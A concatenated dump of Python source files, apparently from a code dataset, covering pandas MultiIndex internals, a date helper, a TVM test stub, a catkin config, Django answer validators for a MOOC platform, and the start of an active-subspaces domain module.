if key.start is not None:
start = level_index.get_loc(key.start)
else:
start = 0
if key.stop is not None:
stop = level_index.get_loc(key.stop)
elif isinstance(start, slice):
stop = len(level_index)
else:
stop = len(level_index) - 1
step = key.step
except KeyError:
# we have a partial slice (like looking up a partial date
# string)
start = stop = level_index.slice_indexer(key.start, key.stop, key.step)
step = start.step
if isinstance(start, slice) or isinstance(stop, slice):
# we have a slice for start and/or stop
# a partial date slicer on a DatetimeIndex generates a slice
# note that the stop ALREADY includes the stopped point (if
# it was a string sliced)
start = getattr(start, "start", start)
stop = getattr(stop, "stop", stop)
return convert_indexer(start, stop, step)
elif level > 0 or self._lexsort_depth == 0 or step is not None:
# need to have like semantics here to right
# searching as when we are using a slice
# so include the stop+1 (so we include stop)
return convert_indexer(start, stop + 1, step)
else:
# sorted, so can return slice object -> view
i = level_codes.searchsorted(start, side="left")
j = level_codes.searchsorted(stop, side="right")
return slice(i, j, step)
else:
idx = self._get_loc_single_level_index(level_index, key)
if level > 0 or self._lexsort_depth == 0:
# Desired level is not sorted
if isinstance(idx, slice):
# test_get_loc_partial_timestamp_multiindex
locs = (level_codes >= idx.start) & (level_codes < idx.stop)
return locs
locs = np.array(level_codes == idx, dtype=bool, copy=False)
if not locs.any():
# The label is present in self.levels[level] but unused:
raise KeyError(key)
return locs
if isinstance(idx, slice):
# e.g. test_partial_string_timestamp_multiindex
start = level_codes.searchsorted(idx.start, side="left")
# NB: "left" here bc of slice semantics
end = level_codes.searchsorted(idx.stop, side="left")
else:
start = level_codes.searchsorted(idx, side="left")
end = level_codes.searchsorted(idx, side="right")
if start == end:
# The label is present in self.levels[level] but unused:
raise KeyError(key)
return slice(start, end)
def get_locs(self, seq):
"""
Get location for a sequence of labels.
Parameters
----------
seq : label, slice, list, mask or a sequence of such
You should use one of the above for each level.
If a level should not be used, set it to ``slice(None)``.
Returns
-------
numpy.ndarray
NumPy array of integers suitable for passing to iloc.
See Also
--------
MultiIndex.get_loc : Get location for a label or a tuple of labels.
MultiIndex.slice_locs : Get slice location given start label(s) and
end label(s).
Examples
--------
>>> mi = pd.MultiIndex.from_arrays([list('abb'), list('def')])
>>> mi.get_locs('b') # doctest: +SKIP
array([1, 2], dtype=int64)
>>> mi.get_locs([slice(None), ['e', 'f']]) # doctest: +SKIP
array([1, 2], dtype=int64)
>>> mi.get_locs([[True, False, True], slice('e', 'f')]) # doctest: +SKIP
array([2], dtype=int64)
"""
# must be lexsorted to at least as many levels
true_slices = [i for (i, s) in enumerate(com.is_true_slices(seq)) if s]
if true_slices and true_slices[-1] >= self._lexsort_depth:
raise UnsortedIndexError(
"MultiIndex slicing requires the index to be lexsorted: slicing "
f"on levels {true_slices}, lexsort depth {self._lexsort_depth}"
)
n = len(self)
# indexer is the list of all positions that we want to take; we
# start with it being everything and narrow it down as we look at each
# entry in `seq`
indexer = Index(np.arange(n))
def _convert_to_indexer(r) -> Int64Index:
# return an indexer
if isinstance(r, slice):
m = np.zeros(n, dtype=bool)
m[r] = True
r = m.nonzero()[0]
elif com.is_bool_indexer(r):
if len(r) != n:
raise ValueError(
"cannot index with a boolean indexer "
"that is not the same length as the "
"index"
)
r = r.nonzero()[0]
return Int64Index(r)
def _update_indexer(idxr: Index, indexer: Index) -> Index:
indexer_intersection = indexer.intersection(idxr)
if indexer_intersection.empty and not idxr.empty and not indexer.empty:
raise KeyError(seq)
return indexer_intersection
for i, k in enumerate(seq):
if com.is_bool_indexer(k):
# a boolean indexer, must be the same length!
k = np.asarray(k)
lvl_indexer = _convert_to_indexer(k)
indexer = _update_indexer(lvl_indexer, indexer=indexer)
elif is_list_like(k):
# a collection of labels to include from this level (these
# are or'd)
indexers: Int64Index | None = None
# GH#27591 check if this is a single tuple key in the level
try:
# Argument "indexer" to "_get_level_indexer" of "MultiIndex"
# has incompatible type "Index"; expected "Optional[Int64Index]"
lev_loc = self._get_level_indexer(
k, level=i, indexer=indexer # type: ignore[arg-type]
)
except (InvalidIndexError, TypeError, KeyError) as err:
# InvalidIndexError e.g. non-hashable, fall back to treating
# this as a sequence of labels
# KeyError it can be ambiguous if this is a label or sequence
# of labels
# github.com/pandas-dev/pandas/issues/39424#issuecomment-871626708
for x in k:
if not is_hashable(x):
# e.g. slice
raise err
try:
# Argument "indexer" to "_get_level_indexer" of "MultiIndex"
# has incompatible type "Index"; expected
# "Optional[Int64Index]"
item_lvl_indexer = self._get_level_indexer(
x, level=i, indexer=indexer # type: ignore[arg-type]
)
except KeyError:
# ignore not founds; see discussion in GH#39424
warnings.warn(
"The behavior of indexing on a MultiIndex with a "
"nested sequence of labels is deprecated and will "
"change in a future version. "
"`series.loc[label, sequence]` will raise if any "
"members of 'sequence' or not present in "
"the index's second level. To retain the old "
"behavior, use `series.index.isin(sequence, level=1)`",
# TODO: how to opt in to the future behavior?
# TODO: how to handle IntervalIndex level?
# (no test cases)
FutureWarning,
stacklevel=7,
)
continue
else:
idxrs = _convert_to_indexer(item_lvl_indexer)
if indexers is None:
indexers = idxrs
else:
indexers = indexers.union(idxrs, sort=False)
else:
idxrs = _convert_to_indexer(lev_loc)
if indexers is None:
indexers = idxrs
else:
indexers = indexers.union(idxrs, sort=False)
if indexers is not None:
indexer = _update_indexer(indexers, indexer=indexer)
else:
# no matches we are done
# test_loc_getitem_duplicates_multiindex_empty_indexer
return np.array([], dtype=np.intp)
elif com.is_null_slice(k):
# empty slice
pass
elif isinstance(k, slice):
# a slice, include BOTH of the labels
# Argument "indexer" to "_get_level_indexer" of "MultiIndex" has
# incompatible type "Index"; expected "Optional[Int64Index]"
lvl_indexer = self._get_level_indexer(
k,
level=i,
indexer=indexer, # type: ignore[arg-type]
)
indexer = _update_indexer(
_convert_to_indexer(lvl_indexer),
indexer=indexer,
)
else:
# a single label
lvl_indexer = self._get_loc_level(k, level=i)[0]
indexer = _update_indexer(
_convert_to_indexer(lvl_indexer),
indexer=indexer,
)
# empty indexer
if indexer is None:
return np.array([], dtype=np.intp)
assert isinstance(indexer, Int64Index), type(indexer)
indexer = self._reorder_indexer(seq, indexer)
return indexer._values.astype(np.intp, copy=False)
# --------------------------------------------------------------------
def _reorder_indexer(
self,
seq: tuple[Scalar | Iterable | AnyArrayLike, ...],
indexer: Int64Index,
) -> Int64Index:
"""
Reorder an indexer of a MultiIndex (self) so that the label are in the
same order as given in seq
Parameters
----------
seq : label/slice/list/mask or a sequence of such
indexer: an Int64Index indexer of self
Returns
-------
indexer : a sorted Int64Index indexer of self ordered as seq
"""
# If the index is lexsorted and the list_like label in seq are sorted
# then we do not need to sort
if self._is_lexsorted():
need_sort = False
for i, k in enumerate(seq):
if is_list_like(k):
if not need_sort:
k_codes = self.levels[i].get_indexer(k)
k_codes = k_codes[k_codes >= 0] # Filter absent keys
# True if the given codes are not ordered
need_sort = (k_codes[:-1] > k_codes[1:]).any()
elif isinstance(k, slice) and k.step is not None and k.step < 0:
need_sort = True
# Bail out if both index and seq are sorted
if not need_sort:
return indexer
n = len(self)
keys: tuple[np.ndarray, ...] = ()
# For each level of the sequence in seq, map the level codes with the
# order they appears in a list-like sequence
# This mapping is then use to reorder the indexer
for i, k in enumerate(seq):
if is_scalar(k):
# GH#34603 we want to treat a scalar the same as an all equal list
k = [k]
if com.is_bool_indexer(k):
new_order = np.arange(n)[indexer]
elif is_list_like(k):
# Generate a map with all level codes as sorted initially
k = algos.unique(k)
key_order_map = np.ones(len(self.levels[i]), dtype=np.uint64) * len(
self.levels[i]
)
# Set order as given in the indexer list
level_indexer = self.levels[i].get_indexer(k)
level_indexer = level_indexer[level_indexer >= 0] # Filter absent keys
key_order_map[level_indexer] = np.arange(len(level_indexer))
new_order = key_order_map[self.codes[i][indexer]]
elif isinstance(k, slice) and k.step is not None and k.step < 0:
new_order = np.arange(n)[k][indexer]
elif isinstance(k, slice) and k.start is None and k.stop is None:
# slice(None) should not determine order GH#31330
new_order = np.ones((n,))[indexer]
else:
# For all other case, use the same order as the level
new_order = np.arange(n)[indexer]
keys = (new_order,) + keys
# Find the reordering using lexsort on the keys mapping
ind = np.lexsort(keys)
return indexer[ind]
def truncate(self, before=None, after=None) -> MultiIndex:
"""
Slice index between two labels / tuples, return new MultiIndex
Parameters
----------
before : label or tuple, can be partial. Default None
None defaults to start
after : label or tuple, can be partial. Default None
None defaults to end
Returns
-------
truncated : MultiIndex
"""
if after and before and after < before:
raise ValueError("after < before")
i, j = self.levels[0].slice_locs(before, after)
left, right = self.slice_locs(before, after)
new_levels = list(self.levels)
new_levels[0] = new_levels[0][i:j]
new_codes = [level_codes[left:right] for level_codes in self.codes]
new_codes[0] = new_codes[0] - i
return MultiIndex(
levels=new_levels,
codes=new_codes,
names=self._names,
verify_integrity=False,
)
def equals(self, other: object) -> bool:
"""
Determines if two MultiIndex objects have the same labeling information
(the levels themselves do not necessarily have to be the same)
See Also
--------
equal_levels
"""
if self.is_(other):
return True
if not isinstance(other, Index):
return False
if len(self) != len(other):
return False
if not isinstance(other, MultiIndex):
# d-level MultiIndex can equal d-tuple Index
if not self._should_compare(other):
# object Index or Categorical[object] may contain tuples
return False
return array_equivalent(self._values, other._values)
if self.nlevels != other.nlevels:
return False
for i in range(self.nlevels):
self_codes = self.codes[i]
other_codes = other.codes[i]
self_mask = self_codes == -1
other_mask = other_codes == -1
if not np.array_equal(self_mask, other_mask):
return False
self_codes = self_codes[~self_mask]
self_values = self.levels[i]._values.take(self_codes)
other_codes = other_codes[~other_mask]
other_values = other.levels[i]._values.take(other_codes)
# since we use NaT both datetime64 and timedelta64 we can have a
# situation where a level is typed say timedelta64 in self (IOW it
# has other values than NaT) but types datetime64 in other (where
# its all NaT) but these are equivalent
if len(self_values) == 0 and len(other_values) == 0:
continue
if not array_equivalent(self_values, other_values):
return False
return True
def equal_levels(self, other: MultiIndex) -> bool:
"""
Return True if the levels of both MultiIndex objects are the same
"""
if self.nlevels != other.nlevels:
return False
for i in range(self.nlevels):
if not self.levels[i].equals(other.levels[i]):
return False
return True
# --------------------------------------------------------------------
# Set Methods
def _union(self, other, sort) -> MultiIndex:
other, result_names = self._convert_can_do_setop(other)
if (
any(-1 in code for code in self.codes)
and any(-1 in code for code in other.codes)
or self.has_duplicates
or other.has_duplicates
):
# This is only necessary if both sides have nans or one has dups,
# fast_unique_multiple is faster
result = super()._union(other, sort)
else:
rvals = other._values.astype(object, copy=False)
result = lib.fast_unique_multiple([self._values, rvals], sort=sort)
return MultiIndex.from_arrays(zip(*result), sortorder=0, names=result_names)
def _is_comparable_dtype(self, dtype: DtypeObj) -> bool:
return is_object_dtype(dtype)
def _get_reconciled_name_object(self, other) -> MultiIndex:
"""
If the result of a set operation will be self,
return self, unless the names change, in which
case make a shallow copy of self.
"""
names = self._maybe_match_names(other)
if self.names != names:
# Incompatible return value type (got "Optional[MultiIndex]", expected
# "MultiIndex")
return self.rename(names) # type: ignore[return-value]
return self
def _maybe_match_names(self, other):
"""
Try to find common names to attach to the result of an operation between
a and b. Return a consensus list of names if they match at least partly
or list of None if they have completely different names.
"""
if len(self.names) != len(other.names):
return [None] * len(self.names)
names = []
for a_name, b_name in zip(self.names, other.names):
if a_name == b_name:
names.append(a_name)
else:
# TODO: what if they both have np.nan for their names?
names.append(None)
return names
def _wrap_intersection_result(self, other, result) -> MultiIndex:
_, result_names = self._convert_can_do_setop(other)
if len(result) == 0:
return MultiIndex(
levels=self.levels,
codes=[[]] * self.nlevels,
names=result_names,
verify_integrity=False,
)
else:
return MultiIndex.from_arrays(zip(*result), sortorder=0, names=result_names)
def _wrap_difference_result(self, other, result) -> MultiIndex:
_, result_names = self._convert_can_do_setop(other)
if len(result) == 0:
return MultiIndex(
levels=[[]] * self.nlevels,
codes=[[]] * self.nlevels,
names=result_names,
verify_integrity=False,
)
else:
return MultiIndex.from_tuples(result, sortorder=0, names=result_names)
def _convert_can_do_setop(self, other):
result_names = self.names
if not isinstance(other, Index):
if len(other) == 0:
return self[:0], self.names
else:
msg = "other must be a MultiIndex or a list of tuples"
try:
other = MultiIndex.from_tuples(other, names=self.names)
except (ValueError, TypeError) as err:
# ValueError raised by tuples_to_object_array if we
# have non-object dtype
raise TypeError(msg) from err
else:
result_names = get_unanimous_names(self, other)
return other, result_names
# --------------------------------------------------------------------
@doc(Index.astype)
def astype(self, dtype, copy: bool = True):
dtype = pandas_dtype(dtype)
if is_categorical_dtype(dtype):
msg = "> 1 ndim Categorical are not supported at this time"
raise NotImplementedError(msg)
elif not is_object_dtype(dtype):
raise TypeError(
"Setting a MultiIndex dtype to anything other than object "
"is not supported"
)
elif copy is True:
return self._view()
return self
def _validate_fill_value(self, item):
if isinstance(item, MultiIndex):
# GH#43212
if item.nlevels != self.nlevels:
raise ValueError("Item must have length equal to number of levels.")
return item._values
elif not isinstance(item, tuple):
# Pad the key with empty strings if lower levels of the key
# aren't specified:
item = (item,) + ("",) * (self.nlevels - 1)
elif len(item) != self.nlevels:
raise ValueError("Item must have length equal to number of levels.")
return item
def insert(self, loc: int, item) -> MultiIndex:
"""
Make new MultiIndex inserting new item at location
Parameters
----------
loc : int
item : tuple
Must be same length as number of levels in the MultiIndex
Returns
-------
new_index : Index
"""
item = self._validate_fill_value(item)
new_levels = []
new_codes = []
for k, level, level_codes in zip(item, self.levels, self.codes):
if k not in level:
# have to insert into level
# must insert at end otherwise you have to recompute all the
# other codes
lev_loc = len(level)
level = level.insert(lev_loc, k)
else:
lev_loc = level.get_loc(k)
new_levels.append(level)
new_codes.append(np.insert(ensure_int64(level_codes), loc, lev_loc))
return MultiIndex(
levels=new_levels, codes=new_codes, names=self.names, verify_integrity=False
)
def delete(self, loc) -> MultiIndex:
"""
Make new index with passed location deleted
Returns
-------
new_index : MultiIndex
"""
new_codes = [np.delete(level_codes, loc) for level_codes in self.codes]
return MultiIndex(
levels=self.levels,
codes=new_codes,
names=self.names,
verify_integrity=False,
)
@doc(Index.isin)
def isin(self, values, level=None) -> npt.NDArray[np.bool_]:
if level is None:
values = MultiIndex.from_tuples(values, names=self.names)._values
return algos.isin(self._values, values)
else:
num = self._get_level_number(level)
levs = self.get_level_values(num)
if levs.size == 0:
return np.zeros(len(levs), dtype=np.bool_)
return levs.isin(values)
@deprecate_nonkeyword_arguments(version=None, allowed_args=["self", "names"])
def set_names(self, names, level=None, inplace: bool = False) -> MultiIndex | None:
return super().set_names(names=names, level=level, inplace=inplace)
rename = set_names
@deprecate_nonkeyword_arguments(version=None, allowed_args=["self"])
def drop_duplicates(self, keep: str | bool = "first") -> MultiIndex:
return super().drop_duplicates(keep=keep)
# ---------------------------------------------------------------
# Arithmetic/Numeric Methods - Disabled
__add__ = make_invalid_op("__add__")
__radd__ = make_invalid_op("__radd__")
__iadd__ = make_invalid_op("__iadd__")
__sub__ = make_invalid_op("__sub__")
__rsub__ = make_invalid_op("__rsub__")
__isub__ = make_invalid_op("__isub__")
__pow__ = make_invalid_op("__pow__")
__rpow__ = make_invalid_op("__rpow__")
__mul__ = make_invalid_op("__mul__")
__rmul__ = make_invalid_op("__rmul__")
__floordiv__ = make_invalid_op("__floordiv__")
__rfloordiv__ = make_invalid_op("__rfloordiv__")
__truediv__ = make_invalid_op("__truediv__")
__rtruediv__ = make_invalid_op("__rtruediv__")
__mod__ = make_invalid_op("__mod__")
__rmod__ = make_invalid_op("__rmod__")
__divmod__ = make_invalid_op("__divmod__")
__rdivmod__ = make_invalid_op("__rdivmod__")
# Unary methods disabled
__neg__ = make_invalid_op("__neg__")
__pos__ = make_invalid_op("__pos__")
__abs__ = make_invalid_op("__abs__")
__inv__ = make_invalid_op("__inv__")
def _lexsort_depth(codes: list[np.ndarray], nlevels: int) -> int:
"""Count depth (up to a maximum of `nlevels`) with which codes are lexsorted."""
int64_codes = [ensure_int64(level_codes) for level_codes in codes]
for k in range(nlevels, 0, -1):
if libalgos.is_lexsorted(int64_codes[:k]):
return k
return 0
def sparsify_labels(label_list, start: int = 0, sentinel=""):
pivoted = list(zip(*label_list))
k = len(label_list)
result = pivoted[: start + 1]
prev = pivoted[start]
for cur in pivoted[start + 1 :]:
sparse_cur = []
for i, (p, t) in enumerate(zip(prev, cur)):
if i == k - 1:
sparse_cur.append(t)
result.append(sparse_cur)
break
if p == t:
sparse_cur.append(sentinel)
else:
sparse_cur.extend(cur[i:])
result.append(sparse_cur)
break
prev = cur
return list(zip(*result))
def _get_na_rep(dtype) -> str:
return {np.datetime64: "NaT", np.timedelta64: "NaT"}.get(dtype, "NaN")
def maybe_droplevels(index: Index, key) -> Index:
"""
Attempt to drop level or levels from the given index.
Parameters
----------
index: Index
key : scalar or tuple
Returns
-------
Index
"""
# drop levels
original_index = index
if isinstance(key, tuple):
for _ in key:
try:
index = index._drop_level_numbers([0])
except ValueError:
# we have dropped too much, so back out
return original_index
else:
try:
index = index._drop_level_numbers([0])
except ValueError:
pass
return index
def _coerce_indexer_frozen(array_like, categories, copy: bool = False) -> np.ndarray:
"""
Coerce the array-like indexer to the smallest integer dtype that can encode all
of the given categories.
Parameters
----------
array_like : array-like
categories : array-like
copy : bool
Returns
-------
np.ndarray
Non-writeable.
"""
array_like = coerce_indexer_dtype(array_like, categories)
if copy:
array_like = array_like.copy()
array_like.flags.writeable = False
return array_like
def _require_listlike(level, arr, arrname: str):
"""
Ensure that level is either None or listlike, and arr is list-of-listlike.
"""
if level is not None and not is_list_like(level):
if not is_list_like(arr):
raise TypeError(f"{arrname} must be list-like")
if is_list_like(arr[0]):
raise TypeError(f"{arrname} must be list-like")
level = [level]
arr = [arr]
elif level is None or is_list_like(level):
if not is_list_like(arr) or not is_list_like(arr[0]):
raise TypeError(f"{arrname} must be list of lists-like")
return level, arr
| 34.359755 | 88 | 0.533148 |
a483ede61a9cc7a58b855d8bc24488c21b9c7142 | 194 | py | Python | tomaty/lib/utilities/date_utilities.py | nucle0tides/tomaty | 45eb0475f9e9635a6aa2fe41606e4d2fb6403101 | [
"MIT"
] | 5 | 2018-03-29T16:27:36.000Z | 2020-06-14T15:19:19.000Z | tomaty/lib/utilities/date_utilities.py | nucle0tides/tomaty | 45eb0475f9e9635a6aa2fe41606e4d2fb6403101 | [
"MIT"
] | 29 | 2018-03-29T16:29:43.000Z | 2018-04-24T02:03:13.000Z | tomaty/lib/utilities/date_utilities.py | nucle0tides/tomaty | 45eb0475f9e9635a6aa2fe41606e4d2fb6403101 | [
"MIT"
] | 2 | 2018-03-29T16:27:39.000Z | 2018-03-29T20:42:03.000Z | from datetime import timedelta, datetime
def string_to_timedelta(datestr):
t = datetime.strptime(datestr, '%H:%M:%S')
return timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
| 32.333333 | 70 | 0.742268 |
b1de9ec75221cc1a4a1a4719d1bdec58a6cc349b | 917 | py | Python | tests/python/contrib/test_hexagon/test_relax_integration.py | octoml/relax | 41f14415ba28d62e155b75ea2c740b25213a9970 | [
"Apache-2.0"
] | 11 | 2021-11-02T00:49:16.000Z | 2021-11-19T02:17:00.000Z | tests/python/contrib/test_hexagon/test_relax_integration.py | octoml/relax | 41f14415ba28d62e155b75ea2c740b25213a9970 | [
"Apache-2.0"
] | 16 | 2021-11-02T00:17:12.000Z | 2021-11-21T20:47:52.000Z | tests/python/contrib/test_hexagon/test_relax_integration.py | octoml/relax | 41f14415ba28d62e155b75ea2c740b25213a9970 | [
"Apache-2.0"
] | 4 | 2021-11-05T18:17:23.000Z | 2021-11-11T06:22:00.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm.testing
@tvm.testing.requires_hexagon
def test_simple():
pass
if __name__ == "__main__":
tvm.testing.main()
| 32.75 | 62 | 0.762268 |
2249eabccebce6f55538df48e6f4d43054666f25 | 580 | py | Python | build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py | odinase/roswiimote | b3a9b4c18a1598f8cf4399e038d1cddd06954063 | [
"MIT"
] | null | null | null | build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py | odinase/roswiimote | b3a9b4c18a1598f8cf4399e038d1cddd06954063 | [
"MIT"
] | null | null | null | build/wiimote_state_estimation/catkin_generated/pkg.develspace.context.pc.py | odinase/roswiimote | b3a9b4c18a1598f8cf4399e038d1cddd06954063 | [
"MIT"
] | null | null | null | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/odin/ros_testing/roswiimote/src/wiimote_state_estimation/include".split(';') if "/home/odin/ros_testing/roswiimote/src/wiimote_state_estimation/include" != "" else []
PROJECT_CATKIN_DEPENDS = "message_runtime;roscpp;std_msgs;sensor_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "wiimote_state_estimation"
PROJECT_SPACE_DIR = "/home/odin/ros_testing/roswiimote/devel"
PROJECT_VERSION = "0.0.0"
| 64.444444 | 207 | 0.77931 |
588a39493e74947f33f29aab4a6a3325dd634be6 | 4,572 | py | Python | moocng/api/validation.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 36 | 2015-01-10T06:00:36.000Z | 2020-03-19T10:06:59.000Z | moocng/api/validation.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 3 | 2015-10-01T17:59:32.000Z | 2018-09-04T03:32:17.000Z | moocng/api/validation.py | OpenMOOC/moocng | 1e3dafb84aa1838c881df0c9bcca069e47c7f52d | [
"Apache-2.0"
] | 17 | 2015-01-13T03:46:58.000Z | 2020-07-05T06:29:51.000Z | # -*- coding: utf-8 -*-
# Copyright 2012-2013 UNED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cgi import escape
from datetime import datetime
import logging
from django.conf import settings
from django.core.exceptions import ValidationError
from tastypie.validation import Validation
from moocng.courses.models import Question, Option
from moocng.mongodb import get_db
logger = logging.getLogger(__name__)
def answer_validate_date(bundle, request=None):
question_id = bundle.data.get("question_id", None)
if question_id is None:
raise ValidationError("question_id is required")
question = Question.objects.get(id=question_id)
unit = question.kq.unit
if (unit.unittype != 'n' and unit.deadline and
datetime.now(unit.deadline.tzinfo) > unit.deadline):
raise ValidationError("Unit's deadline is exceed")
return {}
class AnswerValidation(Validation):
def _gen_message(self, username, reply, should_be):
return 'Reply from user %s for option %s is should be %s but is %s' % (
username, reply['option'], should_be,
escape(unicode(type(reply['value']))))
def is_valid(self, bundle, request=None):
errors = {}
errors.update(self.validate_date(bundle, request))
errors.update(self.validate_replyList(bundle, request))
return errors
def validate_date(self, bundle, request=None):
return answer_validate_date(bundle, request)
def validate_replyList(self, bundle, request=None):
questionID = bundle.data.get("question_id", None)
replyList = bundle.data.get("replyList", None)
if (replyList is None or not isinstance(replyList, list) or
len(replyList) == 0):
msg = "replyList is empty or isn't a list"
logger.error(msg)
raise ValidationError(msg)
if (questionID is not None) and (len(bundle.data['replyList']) > 0):
try:
question = Question.objects.get(id=questionID)
for reply in bundle.data['replyList']:
option = question.option_set.get(id=reply['option'])
msg = None
if (option.optiontype == 't') and (not isinstance(reply['value'], basestring)):
msg = self._gen_message(request.user.username, reply, 'text')
elif (option.optiontype in ['c', 'r']) and (not isinstance(reply['value'], bool)):
msg = self._gen_message(request.user.username, reply, 'boolean')
if msg is not None:
logger.error(msg)
raise ValidationError(msg)
except Question.DoesNotExist:
msg = 'Question %s does not exist' % questionID
logger.error(msg)
raise ValidationError(msg)
except Option.DoesNotExist:
msg = 'Option %s does not exist' % reply['option']
logger.error(msg)
raise ValidationError(msg)
return {}
class PeerReviewSubmissionsResourceValidation(Validation):
def is_valid(self, bundle, request):
if not bundle.data or not ("kq" in bundle.data):
return {'__all__': 'Expected kq id'}
errors = {}
db = get_db()
collection = db.get_collection("peer_review_submissions")
exists = collection.find({
"kq": bundle.data["kq"],
"author": unicode(request.user.id)
})
if exists.count() > 0:
msg = "Already exists a submission for kq=%s and user=%s" % (
bundle.data["kq"],
request.user.id)
logger.error(msg)
errors["kq"] = [msg]
errors["author"] = [msg]
text = bundle.data.get("text", "")
max_text_leng = getattr(settings, "PEER_REVIEW_TEXT_MAX_SIZE", 5000)
if len(text) > max_text_leng:
errors["text"] = "Text is longer than %s chars" % max_text_leng
return errors
| 35.44186 | 102 | 0.617892 |
bcc3b7039c50d47b9d7189eb36868a920c150ea4 | 20,305 | py | Python | active_subspaces/domains.py | carlosal1015/active_subspaces | caaf108fcb89548a374fea7704b0d92d38b4539a | [
"MIT"
] | 1 | 2020-03-16T18:05:05.000Z | 2020-03-16T18:05:05.000Z | active_subspaces/domains.py | carlosal1015/active_subspaces | caaf108fcb89548a374fea7704b0d92d38b4539a | [
"MIT"
] | null | null | null | active_subspaces/domains.py | carlosal1015/active_subspaces | caaf108fcb89548a374fea7704b0d92d38b4539a | [
"MIT"
] | 1 | 2020-03-16T18:05:09.000Z | 2020-03-16T18:05:09.000Z | """Utilities for building the domains and maps for active variables."""
import numpy as np
import logging
from utils.misc import process_inputs, BoundedNormalizer
from scipy.spatial import ConvexHull
from scipy.misc import comb
from utils.qp_solver import QPSolver
from subspaces import Subspaces
class ActiveVariableDomain():
"""
A base class for the domain of functions of active variables.
:cvar Subspaces subspaces: a Subspaces object.
:cvar int m: The dimension of the simulation inputs.
:cvar int n: The dimension of the active subspace.
:cvar ndarray vertY: An ndarray that contains n-dimensional vertices that
define the boundary of the domain when the m-dimensional space is
bounded by a hypercube.
:cvar ndarray vertX: An ndarray of the corners of the m-dimensional
hypercube that map to the points `vertY`.
:cvar scipy.spatial.ConvexHull convhull: The ConvexHull object defined by
the vertices `vertY`.
:cvar dict constraints: A dictionary of linear inequality constraints
conforming to the specifications used in the scipy.optimizer library.
**Notes**
Attributes `vertY`, `vertX`, `convhull`, and `constraints` are None when the
m-dimensional parameter space is unbounded.
"""
subspaces = None
m, n = None, None
vertY, vertX = None, None
convhull, constraints = None, None
class UnboundedActiveVariableDomain(ActiveVariableDomain):
"""
An class for the domain of functions of active variables when the space
of simulation parameters is unbounded.
**Notes**
Using this class assumes that the space of simulation inputs is equipped
with a Gaussian weight function.
"""
def __init__(self, subspaces):
"""
Initialize the UnboundedActiveVariableDomain.
Parameters
:param Subspaces subspaces: A Subspaces object with the `compute`
method already called.
"""
if not isinstance(subspaces, Subspaces):
raise TypeError('subspaces should be a Subspaces object.')
if subspaces.W1 is None:
raise ValueError('The given subspaces has not been computed.')
self.subspaces = subspaces
self.m, self.n = subspaces.W1.shape
class BoundedActiveVariableDomain(ActiveVariableDomain):
"""
An class for the domain of functions of active variables when the space
of simulation parameters is bounded.
**Notes**
Using this class assumes that the space of simulation inputs is equipped
with a uniform weight function. And the space itself is a hypercube.
"""
def __init__(self, subspaces):
"""
Initialize the BoundedActiveVariableDomain.
:param Subspaces subspaces: A Subspaces object with the `compute`
method already called.
"""
if not isinstance(subspaces, Subspaces):
raise TypeError('subspaces should be a Subspaces object.')
if subspaces.W1 is None:
raise ValueError('The given subspaces has not been computed.')
self.subspaces = subspaces
self.m, self.n = subspaces.W1.shape
self.compute_boundary()
def compute_boundary(self):
"""
Compute and set the boundary of the domain.
**Notes**
This function computes the boundary of the active variable range, i.e.,
the domain of a function of the active variables, and it sets the
attributes to the computed components. It is called when the
BoundedActiveVariableDomain is initialized. If the dimension of the
active subspaces is manually changed, then this function must be called
again to recompute the boundary of the domain.
"""
W1 = self.subspaces.W1
m, n = W1.shape
if n == 1:
Y, X = interval_endpoints(W1)
convhull = None
constraints = None
else:
Y, X = zonotope_vertices(W1)
convhull = ConvexHull(Y)
A = convhull.equations[:,:n]
b = convhull.equations[:,n]
constraints = ({'type' : 'ineq',
'fun' : lambda x: np.dot(A, x) - b,
'jac' : lambda x: A})
# store variables
self.vertY, self.vertX = Y, X
self.convhull, self.constraints = convhull, constraints
class ActiveVariableMap():
"""
A base class for the map between active/inactive and original variables.
:cvar ActiveVariableDomain domain: An ActiveVariableDomain object.
**See Also**
domains.UnboundedActiveVariableMap
domains.BoundedActiveVariableMap
"""
domain = None
def __init__(self, domain):
"""
Initialize the ActiveVariableMap.
:param ActiveVariableDomain domain: An ActiveVariableDomain object.
"""
self.domain = domain
def forward(self, X):
"""
Map the points in the original input space to the active and inactive
variables.
:param ndarray X: An M-by-m matrix. Each row of `X` is a point in the
original parameter space
:return: Y, M-by-n matrix that contains points in the space of active
variables. Each row of `Y` corresponds to a row of `X`.
:rtype: ndarray
:return: Z, M-by-(m-n) matrix that contains points in the space of
inactive variables. Each row of `Z` corresponds to a row of `X`.
:rtype: ndarray
"""
X = process_inputs(X)[0]
W1, W2 = self.domain.subspaces.W1, self.domain.subspaces.W2
Y, Z = np.dot(X, W1), np.dot(X, W2)
return Y, Z
def inverse(self, Y, N=1):
"""
Map the points in the active variable space to the original parameter
space.
:param ndarray Y: M-by-n matrix that contains points in the space
of active variables.
:param int N: The number of points in the original parameter space
that are returned that map to the given active variables.
